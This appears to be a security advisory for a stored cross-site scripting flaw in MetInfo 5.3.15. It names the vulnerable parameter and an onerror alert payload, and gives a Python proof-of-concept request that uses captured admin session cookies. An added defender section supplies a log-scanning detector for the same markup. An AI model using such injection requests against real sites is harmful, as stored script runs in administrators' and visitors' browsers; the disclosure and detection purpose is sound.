MetInfo 5.3.15 Stored XSS Vulnerability (CVE-2017-6878)

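Basic fields

Vulnerability ID: SSV-92810
Disclosure/discovery date: Unknown
Submission date: 2017-03-22
Severity:
Vulnerability category: Cross-site scripting
Affected component: MetInfo
Vulnerability author: Arice.chen
Submitter: Knownsec
CVE-ID: CVE-2017-6878
CNNVD-ID: To be added
CNVD-ID: To be added
ZoomEye Dork: To be added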

Source

Vulnerability details


Vulnerability details:

When modifying or adding a message, insert JavaScript test code <img src=x onerror=alert(1)> at the vulnerable position. The attack code is then executed when the relevant pages are accessed in the admin back end, or when other users access the front-end page.

E-mail:callarice () 163 com
DBAppSecurity Ltd
www.dbappsecurity.com.cn

POC:

import requests

# Column editor in the admin back end; the name_2 parameter carries the test payload.
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
# Session cookies captured after logging in to the admin back end.
cookies = dict(
    PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
    recordurl="",
    met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
    met_key="pnZh0Fw",
    langset="cn",
    upgraderemind="1",
    tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list",
)
s = requests.get(url, cookies=cookies, headers=headers, timeout=10, verify=False)
# HTTP 200 only shows that the request was accepted.
if s.status_code == 200:
    print('Success')

Using this PoC requires the cookie obtained after logging in, because the JavaScript is inserted in the admin back end. The vulnerable parameter is name_2 in delete.php; the payload is: <img src=x onerror=alert(2)>

Once the JavaScript has been inserted successfully, the attack code executes in several places in the back end and when other users access the front-end page.
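
A defender-side check for the request described above, as an added example that is not part of the original advisory or of MetInfo: it scans web-server access logs for column-editor requests whose name_<id> parameter contains HTML markup. The combined log format, the constructed sample lines and the generalization from name_2 to name_<id> are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Mar/2017:10:00:01 +0800] "GET /MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&name_2=Products&action=editor HTTP/1.1" 200 12',
    '10.0.0.9 - - [22/Mar/2017:10:02:17 +0800] "GET /MetInfo5.3/admin/column/delete.php?anyid=25&name_2=1%3Cimg%20src=x%20onerror=alert(2)%3E&action=editor HTTP/1.1" 200 12',
    '10.0.0.9 - - [22/Mar/2017:10:03:40 +0800] "GET /MetInfo5.3/index.php?lang=cn HTTP/1.1" 200 5120',
]

# Request line of a log entry; only query strings are visible here, POST bodies are not logged.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Markup that has no place in a column name: a tag opener or an inline event handler.
MARKUP_RE = re.compile(r'<\s*[a-z!/]|\bon[a-z]+\s*=', re.IGNORECASE)
# Assumption: column-name parameters follow the name_<id> pattern seen on the page (name_2).
NAME_PARAM_RE = re.compile(r'name_\d+')


def suspicious_column_edits(lines):
    """Return (client_ip, param, decoded_value) for column edits whose name_<id> holds markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/admin/column/delete.php"):
            continue
        # parse_qsl percent-decodes values, so %3Cimg is compared as <img.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if NAME_PARAM_RE.fullmatch(key) and MARKUP_RE.search(value):
                hits.append((line.split()[0], key, value))
    return hits


if __name__ == "__main__":
    for ip, param, value in suspicious_column_edits(SAMPLE_LOG):
        print(f"{ip} {param}={value!r}")
```

A hit identifies the session that stored the markup; the stored column names themselves still need to be reviewed and cleaned in the database.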


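Reference links

Solution

Temporary solution

No temporary solution available

Official solution

No official solution available

Protection

No protection scheme available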
